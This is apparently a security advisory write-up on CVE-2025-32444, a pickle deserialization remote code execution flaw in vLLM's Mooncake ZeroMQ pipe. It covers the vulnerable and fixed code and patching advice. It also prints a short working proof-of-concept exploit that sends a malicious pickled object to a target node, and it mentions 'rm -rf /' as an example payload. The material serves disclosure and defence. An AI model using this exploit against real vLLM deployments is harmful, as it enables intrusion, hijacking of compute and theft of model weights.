The vulnerability lies in vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py. The developers used pyzmq, the Python bindings for ZeroMQ. This library offers two helper methods that are the bane of Python security researchers everywhere: send_pyobj() and recv_pyobj().

As the names suggest, these methods transmit generic Python objects. Under the hood, they simply call pickle.dumps() on the sender side and pickle.loads() on the receiver side. For the uninitiated: Pickle is not a data format; it is a remote code execution engine. The pickle protocol allows objects to define how they are reconstructed using the __reduce__ method. If you deserialize data from an untrusted source, that data can instruct the Python interpreter to import os and run system('rm -rf /') before the object is even fully instantiated.

To compound the error, the ZMQ sockets were configured to bind to * (wildcard), which translates to 0.0.0.0—listening on all available network interfaces. There was no authentication, no encryption (CurveZMQ was not used), and no IP whitelisting. It was effectively a "Help Yourself" buffet for anyone who could ping the server.

# In mooncake_pipe.py # The socket binds to all interfaces (*) self.receiver_ack.bind(f"tcp://*:{p_rank_offset + 2}") # ... later in the loop ... # Blocks until a message arrives, then blindly unpickles it message = self.receiver_ack.recv_pyobj()

# In mooncake_pipe.py import struct # Bind only to the specific host IP (e.g., local or VPC IP) self.receiver_ack.bind(f"tcp://{self.local_ip}:{p_rank_offset + 2}") # ... later in the loop ... # Receive raw bytes msg_parts = self.receiver_ack.recv_multipart() # Manually unpack expected binary format (Q = unsigned long long) src_rank, length = struct.unpack("QQ", msg_parts[0])

import zmq import pickle import os # The payload class class PwnState: def __reduce__(self): # When unpickled, this executes: /bin/sh -c 'id > /tmp/pwned' return (os.system, ("id > /tmp/pwned",)) # 1. Connect to the vulnerable vLLM node context = zmq.Context() socket = context.socket(zmq.PUSH) # The port is usually 8000 + rank_offset target_ip = "192.168.1.50" target_port = 8001 socket.connect(f"tcp://{target_ip}:{target_port}") # 2. Serialize the payload payload = pickle.dumps(PwnState()) # 3. Send it down the pipe print(f"[*] Sending {len(payload)} bytes of doom to {target_ip}...") socket.send(payload) print("[+] Payload sent. Check your shell.")

Product

Affected Versions

Fixed Version

vLLM

vLLM Project

0.6.5 <= version < 0.8.5

0.8.5

Attribute

Detail

CWE ID

CWE-502 (Deserialization of Untrusted Data)

CVSS v3.1

10.0 (CRITICAL)

Attack Vector

Network

EPSS Score

3.07% (86th Percentile)

Impact

Remote Code Execution (RCE)

Protocol

ZeroMQ (ZMQ)

CVE-2025-32444

10.03.07%

Pickle Rick's Revenge: Critical RCE in vLLM Mooncake

Amit Schendel

Senior Security Researcher

Feb 21, 2026·6 min read·11 visits

PoC Available

Executive Summary (TL;DR)

Critical RCE in vLLM's Mooncake integration (v0.6.5 - <0.8.5) caused by unsafe deserialization of untrusted data (Python pickle) over unauthenticated ZeroMQ sockets. Attackers can execute arbitrary code by sending a crafted packet to the exposed port.

In the race for blazing-fast LLM inference, security often takes a backseat to throughput. vLLM, the industry-standard engine for serving large language models, introduced a critical vulnerability in its 'Mooncake' distributed KV cache transfer system. By utilizing Python's insecure `pickle` serialization over unauthenticated ZeroMQ sockets bound to all network interfaces, the software exposed high-value GPU clusters to trivial Remote Code Execution (RCE). This flaw allows any attacker with network visibility to execute arbitrary system commands with the privileges of the vLLM process, earning it a rare and terrifying CVSS 10.0 score.

Attack Flow Diagram

The Hook: Speed Kills

If you are running Large Language Models (LLMs) in production, you are probably using vLLM. It is the gold standard for high-throughput inference, managing memory paging (PagedAttention) like an operating system manages RAM. To make things even faster across distributed setups, the developers integrated Mooncake, a specialized architecture for transferring Key-Value (KV) caches between nodes. The goal? Reduce latency during prefill and decoding phases in distributed inference.

But here is the catch: Distributed systems require communication pipes. And when developers prioritize speed and "ease of implementation" over security hygiene, those pipes turn into open sewers. The Mooncake integration needed a way to send metadata between nodes. Instead of implementing a rigorous, schema-defined protocol, they opted for Python's built-in magic wand: pickle.

To make matters worse, this communication channel was built on ZeroMQ (ZMQ), a high-performance asynchronous messaging library. While ZMQ is powerful, it is also "batteries included"—and some of those batteries can explode if you don't read the warning label.

The Flaw: The Convenience Trap

The Code: The Smoking Gun

Let's look at the vulnerable code. It's shockingly simple, which makes it so dangerous. The code blindly trusts whatever comes down the pipe.

Vulnerable Implementation (Before):

# In mooncake_pipe.py
# The socket binds to all interfaces (*)
self.receiver_ack.bind(f"tcp://*:{p_rank_offset + 2}")
 
# ... later in the loop ...
# Blocks until a message arrives, then blindly unpickles it
message = self.receiver_ack.recv_pyobj()

The Fix (After): In version 0.8.5, the maintainers ripped out the pickle logic entirely. They switched to recv_multipart (handling raw bytes) and used Python's struct module to unpack specific, expected 64-bit integers. They also stopped binding to 0.0.0.0.

# In mooncake_pipe.py
import struct
 
# Bind only to the specific host IP (e.g., local or VPC IP)
self.receiver_ack.bind(f"tcp://{self.local_ip}:{p_rank_offset + 2}")
 
# ... later in the loop ...
# Receive raw bytes
msg_parts = self.receiver_ack.recv_multipart()
# Manually unpack expected binary format (Q = unsigned long long)
src_rank, length = struct.unpack("QQ", msg_parts[0])

This change eliminates the vulnerability in two ways: it removes the deserialization of arbitrary objects (killing the RCE vector) and reduces the attack surface by binding to specific interfaces.

The Exploit: Ten Lines to Root

Exploiting this does not require complex heap feng shui or race condition handling. It is a textbook serialization attack. The attacker simply needs to act as a ZMQ client and send a pickled object that defines a malicious __reduce__ method.

Here is what a researcher's Proof of Concept (PoC) looks like:

import zmq
import pickle
import os
 
# The payload class
class PwnState:
    def __reduce__(self):
        # When unpickled, this executes: /bin/sh -c 'id > /tmp/pwned'
        return (os.system, ("id > /tmp/pwned",))
 
# 1. Connect to the vulnerable vLLM node
context = zmq.Context()
socket = context.socket(zmq.PUSH)
# The port is usually 8000 + rank_offset
target_ip = "192.168.1.50"
target_port = 8001 
socket.connect(f"tcp://{target_ip}:{target_port}")
 
# 2. Serialize the payload
payload = pickle.dumps(PwnState())
 
# 3. Send it down the pipe
print(f"[*] Sending {len(payload)} bytes of doom to {target_ip}...")
socket.send(payload)
 
print("[+] Payload sent. Check your shell.")

Because vLLM usually runs with access to high-performance filesystems and potentially sensitive training data (or model weights), the impact of this RCE is catastrophic. It is game over.

The Impact: Why You Should Panic

RCE is always bad, but RCE in an AI infrastructure context is worse. These nodes are not running standard web apps; they are running on H100 or A100 GPUs, which cost upwards of $30,000 each.

1. Cryptojacking: The most immediate threat. Attackers can kill the inference process and hijack the GPUs to mine crypto. With the compute power available in a vLLM cluster, this is highly profitable.

2. Intellectual Property Theft: These servers often hold proprietary model weights or LoRA adapters that represent millions of dollars in R&D. An attacker can exfiltrate these files easily.

3. Supply Chain Poisoning: An attacker could modify the model weights in memory or on disk. Imagine an LLM that works perfectly 99% of the time, but has a backdoor trigger that makes it output specific misinformation or malicious code when prompted with a specific phrase.

4. Pivot Point: vLLM nodes are usually deep inside the network, often with access to data lakes (S3 buckets) and other internal services. This vulnerability turns the inference engine into a perfect beachhead for lateral movement.

The Fix: Closing the Window

The mitigation is straightforward but urgent.

1. Patch: Update vLLM to version 0.8.5 immediately. This version removes the recv_pyobj calls and enforces stricter socket binding.

2. Network Segmentation: Even with the patch, why are your inference nodes reachable from the internet? Ensure that the ports used for distributed communication (ZMQ ports) are firewalled off and only accessible by other nodes in the cluster. Use VPC Security Groups or iptables.

3. Configuration: If you are not explicitly using the Mooncake integration for distributed KV transfer, verify your configuration. While the vulnerable code is in the codebase, it is triggered when the Mooncake pipe is initialized.

Official Patches

vLLMGitHub Commit: Fix security issue in Mooncake pipe

Fix Analysis (1)

Technical Appendix

CVSS Score

10.0/ 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

EPSS Probability

3.07%

Top 14% most exploited

Affected Systems

vLLM Inference EngineDistributed AI ClustersSystems using Mooncake KV Cache Transfer

Affected Versions Detail

Product	Affected Versions	Fixed Version
vLLM vLLM Project	0.6.5 <= version < 0.8.5	0.8.5

Attribute	Detail
CWE ID	CWE-502 (Deserialization of Untrusted Data)
CVSS v3.1	10.0 (CRITICAL)
Attack Vector	Network
EPSS Score	3.07% (86th Percentile)
Impact	Remote Code Execution (RCE)
Protocol	ZeroMQ (ZMQ)